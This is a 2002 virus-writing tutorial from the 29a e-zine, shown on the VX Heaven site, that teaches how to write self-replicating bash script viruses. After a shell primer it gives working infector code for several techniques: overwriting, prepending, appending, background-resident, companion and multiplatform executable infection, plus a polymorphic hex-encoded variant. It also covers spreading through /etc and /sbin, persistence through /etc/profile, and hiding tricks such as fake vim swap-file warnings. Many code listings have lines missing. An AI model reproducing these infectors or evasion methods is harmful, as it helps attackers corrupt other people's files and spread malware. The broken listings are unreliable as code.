VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Virus Juice: squeezing bash to get it, another little shell script virus tutorial

29a [6]
March 2002

[Back to index] [Comments]

1. General introduction

1.1. Presentation

This tutorial is intended to give a general perspective on script virus in UNIX environments, as well as showing some examples of what can be done using the explained techniques.

There are many tutorials following the same topic, so this text is not new in that aspect, but I considered of interest writing it so I can give a more global focus to the topic, and show my examples in detail.

To finish this introduction I would like to epmhasize the work of SnakeByte and Gobleen Warrior in this field. I didn't know there were more people interested in this funny type of scripts :-)

1.2. Shell scripting

Let's start from the basics, what is a shell script? As the name says, a shell script is a program interpreted by the shell. A shell is a command interface that translates the commands introduced by the user and executes them.

Every operating system has its own shell or command interpreter, you can find cmd.exe in Windows NT, in Windows 9x, and a big variety in the UNIX family, let's say sh, csh, ksh...

Shell scripts are used to make little programs that will be used very frequently, avoiding us having to introduce the same commands every time we want repetitive actions. This is called batch processing, in which the system executes all the actions listed in the script without the user's intervention.

Scripts are used in UNIX for almost everything: running daemons, configuring programs, enabling services... this is done due to the ease of script programming and the power of UNIX shells.

All this is why shell script viruses have an important space in UNIX systems where to reside, even their detection is almost trivial and their infection methods are rudimentary, as I will explain later on.

1.3. Shell script virus, scope

The first question that comes to us can be: do shell script viruses have sense at all? Up to what point aren't they a mere hobby?

In my opinion, shell script viruses are not a real threat at all in UNIX systems. Any system administrator with common sense should know how to handle them without any difficulty. But in the other way, with the new popularity that Linux, FreeBSD and other UNIX-like systems for PCs are gaining, shell scripts are used by inexpert users that don't know much about what they are doing. In a situation like this, a shell script virus could live without being detected, but it's true that it will hardly infect other systems.

Shell script viruses have a handycap in common with other UNIX system viruses: it is not usual for the users to interchange executable files. Usually files are distributed with their source code, and in the case of the scripts, they are edited to satisfy the needs of the machine in question.

Then, with this, I would like to say that I consider this kind of viruses an entertainment, a way of experimenting and satisfying my own curiosity, and not as real viruses that can deal with other antiviruses and advanced users. I started with this in in my UNIX class, where we had not much to do and had many hours in front of a shell. This helped me to gain some knowledge and experience on shell scripting :-)

2. Shells in UNIX

2.1. Potentialities and compatibilities of the different shells

The difference with other operating systems is that there are many different shells in UNIX, and each of them is specific for certain development environments and have a similar but different syntax.

Because of this, it is very usual to include a row at the beginning of every shell script, in which we select the shell that will take care of the execution of the script, to avoid misunderstandings.

echo Hello, world!

As we can see we make use of an special comment (comments start with an # and finish at the end of line) to indicate where is the specified shell held on. If we don't include that line the script would exectute anyways, but if we were using some specific commands for that shell, it could be a disaster not including it.

Every shell is "strong" in the scope it was designed for, sh is quite disgusting for interactive work, but it's very powerful at scripting. Ksh (Korn Shell) is intended to be more user friendly and is the standard shell in many UNIX systems (e.g. Solaris), csh and its newer version, tcsh is another common UNIX shell. There are many others, each one centered in a different caracteristic (speed, size, etc.).

In this tutorial we will concentrate on the most extended shell, sh or bash (Bourne Again Shell) because it is present in every UNIX system.

2.2. sh and bash, a fact standard

Bash is a new implementation of Stephen Bourne's shell, Bourne Shell. Due to its power and that it has been including other shell's capabilities, it has been gaining ground in the world of shells until becoming a fact standard, this is, a standard because of the intensive use of it.

Usually scripts which are written to be used in a bash shell have .sh extension, even though system scripts don't follow this rule.

In Linux systems /bin/sh is usually a symbolic link to /bin/bash, so there is no difference between them, but in other UNIX systems there are differences with regard to sh, bash and bash2's capability, so this is something to take into account when trying to program in a compatible way.

2.2.1. Bash thoroughly and usual commands

There are many structures, expresions and built-ins in the bash shell which help making complex and powerful scripts, but can confuse the programmer.

For an exhaustive use of bash I recommend the "Advanced Bash-Scripting Guide: A complete guide to shell scripting, using bash", which can be found at in the "Guides" section.

In this chapter of this tutorial I will only explain those bash particularities that we will need to write our shell script viruses. I recommend reading it at the end, as we need a more detailed explanation about the commands and expressions used in the scripts, so please, go to the next chapter ;-)

The "cut" command

The "cut" command is used for getting different fields from the lines of a file. The most usual way of using it is defining a character as a field separator and a field number, for example:

/etc/passwd file:



$> cat /etc/passwd | cut -d":" -f3

we will get the UID of "zert" (1001) because we are defining ":" as a field separator (-d":") and we are requesting the third field (-f3).

With "cut" we can do many other things, but they are not interesting for this tutorial, so if you want to know something more about this command, you know what to do, "man cut" ;-)

The "head" command

With the "head" command we request the first part of a file. We can request a specific number of characters or even a specific number of lines, for example:

$> head -5 /etc/passwd 

gives us the first 5 lines of the file "/etc/passwd".


$> head -c512 /etc/passwd

we get the first 512 characters of "/etc/passwd".

In this tutorial we usually use "head" in combination with "$0" to copy the first lines of the current file into the host.

If you want to know more about this command, "man head" ;-)

Redirecting the output

Bash allows redirecting the standard output (stdout) as well as the standard error output (stderr) to other files. We use ">" to redirect standard output and "2>" to do the same with the standard error output.

Something very usual in shell scripts is redirecting the standard output as well as the standard error output to the same file. Here is an example of how to do it:

$> cat * > currentdir 2>&1


$> cat * 2>&1 > currentdir

Again, check out the manual pages for more info ("man bash").

The "if" structure

In Bash the "if" structure has some peculiarities in opposition to other programming languages, let's see how is its syntax:

if list; then list; [ elif list; then list; ] ... [ else list; ] fi

First of all the first "list" of commands is executed. If the final result is zero (equal to an "exit 0"), then the "then" list will be executed, otherwise the "elif" lists will be executed and if the final result is zero their "then" list is also executed. In the end, if there was no list with the final result set to zero the "else" list is executed.

So, "if" does not need an expresion, it can be a list of commands or any of the conditions that gives for file, string or numeric argument handling:

  1. file conditions:
    -a fileTrue if "file" exists.
    -b fileTrue if "file" exists and is a special block file.
    -c fileTrue if "file" exists and is a special characters file.
    -d fileTrue if "file" exists and is a directory.
    -e fileTrue if "file" exists.
    -f fileTrue if "file" exists and is a normal file.
    -g fileTrue if "file" exists and is set-group-id.
    -h fileTrue if "file" exists and is a symbolic link.
    -k fileTrue if "file" exists and its "sticky" bit is set.
    -p fileTrue if "file" exists and is a named pipe (FIFO).
    -r fileTrue if "file" exists and can be read.
    -s fileTrue if "file" exists and is greater than zero.
    -t fdTrue if "fd" is open and refers to a terminal.
    -u fileTrue if "file" exists and its "set-user-id" bit is set.
    -w fileTrue if "file" exists and is writable.
    -x fileTrue if "file" exists and is executable.
    -O fileTrue if "file" exists and belongs to the efective current user.
    -G fileTrue if "file" exists and belongs to the efective current group.
    -L fileTrue if "file" exists and is a symbolic link.
    -S fileTrue if "file" exists and is a socket.
    -N fileTrue if "file" exists and was modified since last read access.
    file1 -nt file2True if "file1" is newer than "file2".
    file1 -ot file2True if "file1" is older than "file2".
  2. string conditions:
    -z stringTrue if "string"'s length is zero.
    -n stringTrue if "string"'s length is not zero.
    string1 == string2True if both strings are equal. "=" can be used in stead of "=="
    string1 != string2True if strings are different.
    string1 < string2True if "string1" goes lexicographically before "string2".
    string1 > string2True if "string2" goes lexicographically before "string1".
  3. numeric argument conditions:
    arg1 -eq arg2True if arguments are equal.
    arg1 -ne arg2True if arguments are different.
    arg1 -lt arg2True if "arg1" is lower than "arg2".
    arg1 -le arg2True if "arg1" is lower than or equal to "arg2".
    arg1 -gt arg2True if "arg1" is greater than"arg2".
    arg1 -ge arg2True if "arg1" is greater than or equal to "arg2".
The "for" structure

The "for" structure in Bash is also a little bit special, and much more powerful than in most programming languages. Its syntax is like this:

for name [ in word ] ; do list ; done

What it first does is to expand the "word" list, which is a list of strings separated by space characters. After, the "name" variable is asigned the first element of the "word" list and the "list" commands list is executed. It keeps doing the same with all the elements in "word".

If the "word" list is empty nothing will be executed, and the return value will be zero. If it is not empty, the return value will be the one corresponding to the last executed command's return value.

As we can see, this does not have much to do with the typical C or Pascal "for", but we can do similar structures using the "seq" command:

for I in $(seq 1 10)
        echo $I

This will print 10 lines with numbers from 1 to 10, because "seq" generates natural number sequences from 1 to the given parameter, or between the given limits ("seq 5 10" generates numbers from 5 to 10).

The "tr" command

This command is used for translating or deleting characters in a string. It usually receives two parameters, which are two character lists and their translation, for example:

$> echo zert | tr aeiou uoiea

will show "zort" because the "e" from the first list corresponds to the "o" of the second list.

If what we want to do is delete characters we have to use the "-d" option, let's see it in an example:

$> cat /etc/passwd | tr -d a

will show /etc/passwd omitting all the "a"s.

The "source" clause

As in other programming languages we can include source code which is in other files ("#include" in C or "Uses" in Pascal, for example), in bash scripting we can do the same using the "source" clause.

If we had code in a file named "generic", for example, and we wanted to include it in our script, we would just have to do this:


source generic

# our code...

We can also use the compact version of the "source" clause, the ".":


. generic

# our code...
Background execution

As we all know, in a UNIX system, there are many processes running in background without interfering with the user. In bash scripting we can send commands in background without having to wait for it to finish.

To do that its enough to put a "&" character at the end of the command and it will be executed in background. With the "fg" and "bg" commands we will control what is in foreground and background.

Another posibility is to send commands list in parallel, with the help of the brackets, and synchronize them with "wait". Let's see it in an example:


(find / -name passwd; echo got it!)
(seq 65355)

For sure, "find"'s output and "seq"'s output will mix together because they are running concurrently, but with "wait" we can assure that from that point there will be only an execution thread.

The "grep" command

With the "grep" command we can find lines in a file which follow a pattern. It is used to show a line which contains a regular given expresion, the environment of that line, or all the lines except that.

Let's see how can we do it in some examples:

$> grep '#!/bin/sh' *

will show all the lines in every file of the current directory (*) that contain the '#!/bin/sh' pattern.

$> grep [Vv][Ii][Rr][Uu][Ss] *

will show every line in every file of the current directory (*) which contain the word "virus" in upper case as well as low case (we use the UNIX regular expresions, where [Vv] means "V" or "v").

$> grep '#!/bin/sh' -v *

will show every line in every file of the current directory which does not contain the given pattern '#!/bin/sh'.

$> grep '#!/bin/sh' -3 *

will show all the lines in all the files of the current directory (*) which containing the '#!/bin/sh' pattern as well as the 3 upper lines and the 3 lower lines in the file.

The "find" command

This command is used to search files in the directory tree. We can specify many file properties as name, permissions, date, owner, etc. Its use is very easy: we decide where we want to start the search and what properties do our objectives have, for example:

$> find /etc/ -perm +111

will show us every file with any permission enabled starting from the "/etc/" directory".

there are many options in the "find" command, so I recommend to take a look at the manual pages ("man find").

The "tee" command

This command reads from the standard input and writes to the standard output or another file. It's commonly used to redirect a file to itself, avoiding error messages. Let's see an example:

me@localhost:~$ touch 1
me@localhost:~$ touch 2
me@localhost:~$ cat 1 2 > 1
cat: 1: input file is output file
me@localhost:~$ cat 1 2 | tee > 1
me@localhost:~$ echo 1 > 1
me@localhost:~$ echo 2 > 2
me@localhost:~$ cat 1 2 | tee > 1
me@localhost:~$ cat 1
The "AND list" and the "OR list"

To avoid the reiterative use of the "if" structure they are often used the "AND list" and the "OR list". The following example will show the equalities between these and the "if" structure:

[ -d $FILE ] && cd $FILE

is the same as

if [ -d $FILE ]
        cd $FILE

[ -d $FILE ] || cat $FILE

is the same as

if [ ! -d $FILE ]
        cat $FILE


if [ -d $FILE ]
        cat $FILE

where ":" corresponds to the null instruction in shell scripting, equal to the NOP used in assembler language.

Command blocks

Another improvement in Bash is the posibility of handling a list of commands as a block, and redirect its output or its input as a group, for example:

        head -15 $0
        echo hello!
        cat ./tmp
} > tmp2

would redirect the result of the three commands in the block to the "tmp2" file. This can help writing clean and tiny scripts.

The "printf" command

As well as being a C function, "printf" is a UNIX command that allows a formatted text output. In the examples of this tutorial I have used it to translate hex codes into normal ASCII with "printf \x126", for example, but "printf" is a much more powerful command, as you can see in the info pages ("info printf").

The "file" command

This command tells us about the file type we are handling. It usually tries to guess it by reading file headers, but sometimes can fail.

Look at the manual pages for more info ;-)

String handling in bash

Bash has a powerful group of built-ins for string handling. We can get their length, extract strings from other strings, mix strings, etc.

This kind of expresions are not standard for all the UNIX shells, so we will be gaining speed but losing compatibility using them. If we want to do the same but in a more standard way is better to use the "expr" command.

For an extensive use of this type of built-ins I recommend reading "Advanced Bash-Scripting Guide: A complete guide to shell scripting, using bash", written by Mendel Cooper. In this tutorial I will only use "${#STRING}" to get the length of "STRING", which could be done using "expr length $STRING" in a more standard way but calling an external command.

The "basename" command

This command allows us to extract the name of the program from a call to the program with a path to the executable file. It's very useful when we need to call the same program from a different place.

For example, if we want to execute a script with this command:


"basename $0" inside the code of "" will return "", substracting the path from the call command.

The "alias" clause

When we use very oftenly a command, one way to perform the same action much easier and faster is by using aliases. The main idea is to translate one complex comand to a little and well-known word, for example:

alias findexec="find / -perm +x 2>/dev/null"

Each time we call "findexec" we will really call "find / -perm +x 2>/dev/null", which is much larger and complex to write.

3. Shell script virus

3.1. Infection techniques

We will see the way our shell script viruses are going to infect, pointing up advantages and disadvantages of using every technique. The syntax particularities and the commands we will be using are explained in the chapter 2.1.1.

3.1.1.- Overwriting

It is, without a doubt, the easiest and worst technique, where our virus destroys the host program by overwriting it, making it useless. In any kind of virus this method should be avoided, but anyways, here are some examples of viruses using overwriting technique.

for F in *
        cp $0 $F

This has an easy explanation. For every file in the directory copies itself ($0) to the file.

If we want to copy it only in other shell scripts we could do a check with "head" or "grep", like I will explain later.

for F in $(grep '#!/bin/sh' * 2>/dev/null | cut -d":" -f1)
        head -5 $0 > $F 2>/dev/null

What we do in this example is copy first 5 lines of this script (head -5 $0) to every file containing the string '#!/bin/sh'.

With $() we execute what is inside the brackets and we substitute the result, thus LIST=$(echo dog cat) would be the same as defining LIST="dog cat".

Notice that we have redirected the standard error output (stderr) to /dev/null (2>/dev/null) to avoid error messages that grep can produce.

With cut we separate the information gotten from grep, using only the string before the ":".

Another important thing is that with this technique we will not have to see if the host file was already infected or not, because it will be overwritten, but this fact has to be taken in account in the other infecting methods.

3.1.2. Prepending

This technique consists on allocating the virus code in the beginning of the host file. With this we can assure that our code is the first thing to be executed, but has the problem that our code is excesively detectable.

Let's see an example of this kind of virus:

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                head -11 $0 > tmp
                cat $F >> tmp
                mv tmp $F

We notice that there is a blank line in the beginning of the script. This will be our (silent) infection mark, because the scripts that start with a blank line will not satisfy the "if" condition.

Once a host is found we copy the virus code into a temporal file and then the hosts code. To finish, we move the temporay file into the original host.

As we can see there is a great disadvantage in using a temporary file, which makes the process slower because it has to access to the disk, it makes us detectable in the system and can cause infraction while sharing the file (imagine that a user from two different consoles executes the virus, it would be executed twice, so both viruses would try to use "tmp", but only one could reach itr objective).

This can be avoided using a little trick. In a shell script, all the contents of a file can be stored in a variable, so if we dump the host into a variable in memory instead of another file will would reach our objective:

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' Ç)
                head -11 $0 > $F 2>/dev/null
                echo $HOST | tr Ç '\n' >> $F 2>/dev/null

As it's shown, the variable named HOST contains the host's code so we can avoid using a temporary file. But to do this we have had to use a little trick: as when dumping the host's code into a variable the line jumps are lost, we translate them into another unused character which could be 'Ç', to keep them located. So when dumping back from the file to the file again we will translate those characters into line jumps, getting the original file :-)

Another way of doing a prepending virus is trying not to include our virus' code itself in the beginning of the script. This could take us to think about a "source" or "." clause, which allow to include code from an external file in a single line. But this would separate our virus from the host because the virus code would not be itself in the host's code but in the same directory, and then an infection would not happen in case they are separated.

To avoid this we could use calls to functions inside the shell script code. But functions should be specfied in the beginning of the file, so it would not work. Let's see it with an example:

# ATCHTUNG! This shell script DOESN`T WORK!!!!!
# host code ...
start () {
for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' Ç)
                head -3 $0 > $F 2>/dev/null
                echo $HOST | tr Ç '\n' >> $F 2>/dev/null
                tail -12 $0 >> $F

This code fails when trying to execute "start" because it is not a valid command and has not been defined yet ;-(

3.1.3. Postpending

By using this technique we put our code at the end of the host file so it is more difficult for it to be detected, but in the other hand, we can not assure its execution (if the host script finishes without arriving at the end of its code because of an abnormal exit or an error, for example).

I personally consider this method the best of the explained ones because we avoid being so explicit by putting the code at the end, and usually scripts execute all their code until the end.

At the programming level is similar to the rest of explained examples:

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" -a "$(tail -1 $F 2>/dev/null)" != "# :-P" ]
                tail -8 $0 >> $F 2>/dev/null
# :-P

The most important thing in this example is copying our code at the end of the host file with "tail -8 $0 >> $F 2>/dev/null". Another important point is that we need another infection mark, we can not leave a blank line in the beginning of the file because we will copy our code at the end. That is why we leave a comment (# :-P), so we can detect it in the second part of the "if" ("$(tail -1 $F 2>/dev/null)" != "# :-P").

3.1.4. Residence

When I talk about residence I do not refer to a real residence where the virus is saved into the memory waiting for a shell script to execute and then infect it, and we avoid to be shown in the process list with a LKM (Loadable Kernel Module). In our case of residence is just that our shell script virus stays in background not to delay too much its host's execution.

To do this we will need a temporary file where we will dump our code and then we will invoke it for background execution. Let's see an example:

tail -13 $0 > tmp 2>/dev/null
chmod +x tmp 2>/dev/null
./tmp $0 & 2>/dev/null

exit 0

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' \xc7)
                head -5 $1 > $F 2>/dev/null
                echo $HOST | tr \xc7 '\n' | grep -v '#!/bin/sh'>> $F 2>/dev/null
                tail -14 $1 >> $F 2>/dev/null
rm tmp 2>/dev/null

Let's explain this with a little bit of detail... what we do in the beginning is to copy the virus code into a temporary file, give it execution privileges (chmod +x) and execute it in background (&) sending the current script name as a parameter ($0). This parameter will be used later on.

The host's code would go just after this, and to finish, it exits without executing last part (it is already being executed, because we called tmp&).

In the temporary file we have created the last 13 lines of the virus, this is, the typical things:

It is not really necessary to do all this stuff for such a small code, but this technique can be useful when used with viruses which do complex operations, as we will see in the polymorphic viruses.

If our aim is a resident virus expecting the execution of a possible objective, we have to try the infection of the startup scripts (".bash_rc", "bash_profile"...) to be in execution each time user's shell is launched. Optimal example of this idea would be to infect "/etc/profile", because it's accessed each time an user's logon is done :-)

3.1.5. Companion

A companion virus, as means its name, "follows" the host file, with no modification of it. Usually, the main process of this type of infection is to move the host to another file (commonly hidden) and to write the virus code in a file with the original host's name.

This method has a weak side: if somebody moves one of the "companion" files, the infection will be broken and the virus code wouldn't find it's original host file.

This example shows a companion virus to explain practically the idea:

for F in *
        if [ -f $F ] && [ -x $F ] && [ "$(head -c4 $F 2>/dev/null )" == "ELF" ]
                cp $F .$F -a 2>/dev/null
                head -10 $0 > $F 2>/dev/null
./.$(basename $0)

Assuming all shown until this point, this code doesn't need further explanations. The only fact that may be remarcked is that we use "cp -a" instead of "mv" to move the host file. This is done to mantain all file attributes with no modification. Another important thing is to perform accurately the call to the original host file. We must use "basename $0", because if we use simply ".$0" or "./.$0" and we call the host with a command like this:


we are trying to execute the original host file like this: "../host" or "./../host" respectively, which are obviosly wrong.

This code infects ELF executables from a shell script according to the idea show by SnakeByte in a previous article. In next chapter we will be able to code an evolutionated version of this idea with a multipartite or multiplatform virus, which will infect many types of executable files.

3.1.6. Multiplatform

Multiplatform viruses are known for having the possibility of infecting different platforms. The most spectacular cases are when viruses infect different microprocessors (such as Motorola or Intel), performing rare tricks in assembler.

Shell script viruses are, in essence, multiplatform, because they can expand in multiple platforms as far as a shell exists (almost all UNIX flavors have a Bash version). But I'd like to write about other kind of viruses in this document. We will develop a shell script infector capable of infecting any kind of executable file that has a simple call from a shell:

$>/directory/executable -parameters

This is, without the call to an interpreter or similar like in a Perl executable.

Let's analyze our generic executable infector's code. The idea is to copy ourselves at the beginning of the executable, transforming it into a shell script, whatever the type of file it is. After, we launch an infector process in background so the "host"'s execution is not delayed, and then we dump the "host" code into a temporary file and execute it.

        echo 'for F in *'
        echo 'do'
        echo ' if [ -f $F ] && [ -x $F ] && [ "$(head -c3 $F)" != "#;P" ]'
        echo ' then'
        echo ' TAM=$(expr $(cat $F|wc --bytes|tr -d " ") + 1)'
        echo ' cp $F .$F.tmp -a'
        echo ' {'
        echo ' head -27 $1'
        printf " printf 'tail -c'\n"
        echo ' printf "$TAM"'
        printf ' printf \x27 $0 > .$0.exe 2>/dev/null\\n\x27\n'
        printf ' echo \x27 chmod +x .$0.exe 2>/dev/null\x27\n'
        printf ' echo \x27./.$0.exe $*\x27\n'
        printf ' echo \x27rm .$0.exe 2>/dev/null\x27\n'
        echo ' echo exit 0'
        echo ' } > .$F.tmp 2>/dev/null'
        echo ' cat $F >> .$F.tmp'
        echo ' echo >> .$F.tmp'
        echo ' mv .$F.tmp $F'
        echo ' fi'
        echo 'done'
        echo 'rm $0 2>/dev/null'
} > .$0.inf 2>/dev/null
sh ./.$0.inf $0 &
tail -c716 $0 > .$0.exe 2>/dev/null
chmod +x .$0.exe 2>/dev/null
./.$0.exe $*
rm .$0.exe 2>/dev/null
exit 0
^@^@^@^@^@^@^@4^@ ^@^B^@(^@^G^@^D^@^A^@^@^@^@^@^@^@^@\x80^D^H^@\x80
^D^H\xa0\x90^D^H^@^@^@^@^@^@^@^@^F^@^@^@^@^P^@^@Hello, world!
^@^@^@^D^@^@^@^P^@^@^@  ^@^@^@^C^@^@^@^@^@^@^@^@^@^@^@\xa4^B^@^@'

The first line is our infection mark ("#;P", ;P). After we have a block of "echo"'s and "printf"'s that generate the infector process in "hostname.inf", and execute it in background. The rest of the code lines are for copying the last 716 bytes of the file and reconstruct the "host" in "hostname.exe". After that, we call this file with the requested parameters ("$*") and the we delete it.

[ NOTE: probably the code inserted here will not work, because we are converting a binary ELF file into ASCII mode. If you want to try the functional version of "", look at the tarball included ;-) ]

The temporary files' names are taken from the from the original file, so other infected files are not executed at the same time and write into the same temporary file.

To create an effective infector process we have to avoid that the variables are interpreted by the shell ("$0", "$TAM"). To do this we generate simple quotations by using the "printf" command ("printf '\x27'"), generating the following code:


for F in *
        if [ -f $F ] && [ -x $F ] && [ "$(head -c3 $F)" != "#;P" ]
                TAM=$(expr $(cat $F|wc --bytes|tr -d " ") + 1)
                cp $F .$F.tmp -a
                        head -27 $1
                        printf 'tail -c'\n
                        printf "$TAM"
                        printf '$0 > .$0.exe 2>/dev/null\n'
                        echo 'chmod +x .$0.exe 2>/dev/null'
                        echo './.$0.exe $*'
                        echo 'rm .$0.exe 2>/dev/null'
                        echo exit 0
                } > .$F.tmp 2>/dev/null
                cat $F >> .$F.tmp
                echo >> .$F.tmp
                mv .$F.tmp $F

which will be the one that searches in the current directory for executable files that are not infected ("if [ -f $F ] && [ -x $F ] && [ "$head -c4 $F)" != "#;P" ]") and generate a similar code to "" with them :-)

3.2. Search for objectives

3.2.1. Possible victim detection

A very important thing in a virus' extension is the detection of its possible victims. If we infect files that are not shell script viruses we can make them useless because they will stop working and that will not help the virus to keep extending. That's why we have to work out something to detect shell scripts where we can stay.

There are many possibilities on how to do it:

Any of these ways to find a victim are as the others, but we just have to decide how many system load we want to add to our virus, because the easiest ways can find fewer victims, but are quicker, and viceversa.

3.2.2. How and where do we find them?

All the techniques explained in the previous chapter need to stablish a beginning point for the search.

The most usual thing in simple viruses is to attack the current directory, which is a poor technique because shell scripts do not vary their location in the directory tree.

Another strategy is to descend directories following the ".." pattern until we reach the root directory: we infect the current directory and descend to the upper directory (cd ..), and so on. Is a bit slow and not very exhaustive, it does not range the whole directory tree.

The same way, we can make a recursive search for files, starting from the root directory or from an adequate directory like "/etc/" or "/sbin/" and descending to every branch or subdirectory looking for victims.

A third searching strategy could be the use of a specific file search command like "find". "find" return a list of the files that match the given conditions. Among this conditions you can specify the file type, permissions, name, size, etc. The most usual thing is to request the file list and handle it as usual, but "find" can give an important functionality: it is able to execute an action for every item found, so we can ask it to infect every found file.

For this three search strategies is recommended to use the background execution previously commented, to avoid long executions in the host, because the search for objectives often takes time.

The last strategy that I can think of is to try to attack the most usual scripts in all UNIX systems, like the ones that can be found at "/etc/" or "/sbin/". The main idea is to make a list of "attractive" directories and give it to a "for" so we can find something in them.

Here's a text file with some examples on how to put in practice the explained techniques:

# Current directory (pwd)
for F in *
# [...]

# 'dotdot' ("cd .." recursive)
dotdot () {
        cd $1
        [ "$1" = "/" ] && exit 0
        for F in *
                # virus code
        dotdot ".."
# [...]

# Recursive from /
currentdir () {
        cd $1
        for F in *
                [ -d $F ] && currentdir $F
                # virus code
# [...]

# find (1)
for F in $(find / -perm +111 -type f)
        # [...]

# find (2)
find / -perm +111 -type f -exec sh -c \"#virus code...\"
# [...]

# Usual scripts
LIST="/etc/* /etc/init.d/* /sbin/rc.0/*"
for F in $LIST
# [...]

The different examples follow what is explained before. I have used a compact notation using the "AND list". This code:

[ -d $F ] && currentdir $F

is equal to:

        if [ -d $F ]
                currentdir $F

to do the same but when the "if" does not match the condition we use the "OR list", as explained in chapter 2.2.1.

3.2.3. Shell scripts and "su"

Scripting with some shells is different if the shell is sh or a derivated shell from sh, such as Bash. Bash is very cautious with scripts with SUID bit set. If we forget to call bash with "-c" option in our SUIDed scripts, Bash will act very strangely and is not able to do certain accesses.

Let's see it with an example tested in my Linux Debian Potato 2.2.r3:

me@localhost:~$ cat > foo.txt
hello, world!
me@localhost:~$ chmod 644 foo.txt
me@localhost:~$ cat >
cat foo.txt
me@localhost:~$ chmod 4111
me@localhost:~$ ./
bash: ./ Permission denied
me@localhost:~$ cat foo.txt
hello, world!

As we can see, the system is even more restrictive than the shell itself, as we have access to "foo.txt" from the shell while we don't from the script with "SUID".

If we do the same with an ELF we'll realize that this kind of executables do not have so many restrictions having the SUID bit set:

me@localhost:~$ cat > foo.c
main(){system("cat foo.txt");}
me@localhost:~$ gcc foo.c -o foo
me@localhost:~$ chmod 4111 foo
me@localhost:~$ chmod 600 foo.txt
me@localhost:~$ ./foo
hello, world!
me@localhost:~$ su zert
zert@localhost:/home/me$ ./foo
hello, world!
zert@localhost:/home/me$ ./
./ ./ Permission denied

Other shells (ksh, for instance), don't "drop" the SUID bit. So, if we want to gain privileges attacking and creating SUIDed scripts, we have to remember that is strictly necessary using Bash with "-c" option.

3.3. Hiding techniques

3.3.1. Stupid techniques

Let's see some stupid hiding techniques. As shell scripts are files that are often opened and edited, is very possible that someone opens an infected file and sees our code. A stupid way to avoid this is to confuse the user as the file is opened.

A message in a comment like "Rem File edited by Microsoft Windows, do NOT modify!" should be enough for a simple .BAT and an innocent user. The equivalent in UNIX environments could consist on trying to emulate a message that the "vi" editor usualy writes when some other user is editing the same file from another console. The objective is to make the user believe this is happening so he stops editing the file, but in my opinion, a user with a minimum of intelligence would realize of what happens O:-D

The included text could look like this:


# Found a swap file by the name "..swp"
#   dated: Wed Nov 29 15:23:28 2000
#   owned by: root
#  file name: ~..swp
#   modified: no
#  host name: localhost
#  user name: root
#  process ID: 13086 (still running)
# While opening file "..swp"
#   dated: Wed Nov 29 15:23:27 2000
#(1) Another program may be editing the same file
# If this is the case, be careful not to end up with two
# different instances of the same file when making changes.
# Quit inmediatly.
#(2) An edit session for this file crashed.
# If this is the case, use ":recover" or "vim -r ..swp"
# to recover the changes (see ":help recovery)".
# If you did this already, delete the swap file "..swp"
# to avoid this message.

As I said is a little stupid to try to hide, but there it is as a mere curiosity :-D

3.3.2. File names

A way of difficulting our detection is to use strange names for the temporary files that we will need. The paradigmatic example is "-". That name, if it is introduced from the console, it is typically interpreted as the standard input (stdin) in stead of the file of name "-".

A user with a minimum of inteligence could go through this with a command like: "cat ./-".

Playing with the sameness of the informatical names is also a good way of doing it and names like ".kmem.tmp" or ".core" could be invisible for some users.

3.3.3. Code inclusion, the "source" clause

As explained in the chapter 3.1.3, using "source" or "." we can let our code in the host be just a simple line, which makes reference to the file that really contains the code.

Imagine that our virus is in "..." (strange name O:-D), we can assure that it will be executed if we find a line like "source ..." or ". ..." in the hosts code (morse rulz! ;-D).

3.3.4. Output messages

Capturing the error messages is a must, so they do not appear on the screen and upset the user. Redirecting everything to "/dev/null" we will avoid ugly error messages :-)

3.3.5. Execution delays

When talking about "residence" we have talked about execution delays of the host. If a script that usually longs just for milliseconds now exceeds up to 20 seconds and makes a lot of use of the hard disk, a minimally inteligent user would try to guess what is going on.

To avoid this delays the best thing is to dump all the code into a temporary file and execute this file in background. That way, the host will execute normally, and our virus will have time to act even after the host's execution is finished.

3.3.6. Aliases

Understanding virus size as an exposition factor, using aliases we can reduce our scripts' size. Code readability will be lost, but this fact can be a goodness indeed.

3.3.7.- Polimorphism

Polymorphic viruses in shell script? Seems a joke, but they can be done :-) There are many ways to "polymorphize" our code:

As I said, if you want to know how to put in practice the first of the techniques, look in the article Gobleen Warrior wrote, where they are explained in detail. From now on we will explain other techniques.

When I proposed myself to write a polymorphic virus in shell script I focused on how a polymorphic virus is written: there is a crypting routine and the code varys depending on what technique uses the crypting routine. With this idea in mind I proposed myself to "chiper" my scripts, and what came to my mind was to "hexdump" the script so I could have a hexadecimal dump of my script. This is a group of unreadable characters in which random numbers can be inserted, so it is not a fixed code :-)

And so, the code is stored as a number string inside a comment in the last line of the script, anda a little routine "decrypts" and executes the code.

In every instance of the virus the "ciphered" code is different because random numbers have been inserted, and the routine used to "dechipher" the code is also "polymorphized" using different syntaxes to take same actions.

Let's see this translated into code:

if [ $# != 2 ]
        echo "$0, usage: $0 file_src file_dst"
        exit 1
        echo $(hexdump "$1") >> $2

What this simple script does is to dump the result of "hexdump" into the end of a file. We will use it as the first virus generation, as it will be "ciphered" from the beginning. This way, we write what we want our virus to do, we "cipher" it with this script and we paste it at the end of another script which has de "deciphering" routine:

(virus code)\ 
(decrypt code) ---------------> (decrypt code+virus code crypted)

and with this we get the firs generation of our polymorphic virus.

The next script is the decrypted code, which will be dumped into a temporary file by the "deciphering" routine and executed.

for F in *
        [ "$F" = "-" ] || if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' \xc7)
                { head -2 $0
                echo 'rm ./- 2>/dev/null'
                if [ $RANDOM -lt 16386 ]
                        echo 'for C in $(tail -2 $0); do [ ${#C} -eq 4 ] && printf "\x$(expr substr $C 3 2)\x$(expr substr $C 1 2)">>-; done'
                        echo 'for P in $(tail -2 $0)'
                        echo 'do'
                        echo ' if [ $(expr length $P) -eq 4 ] ; then printf "\x$(expr substr $P 3 2)\x$(expr substr $P 1 2)">>-; fi'
                        echo 'done'
                echo 'sh ./- $0 &'
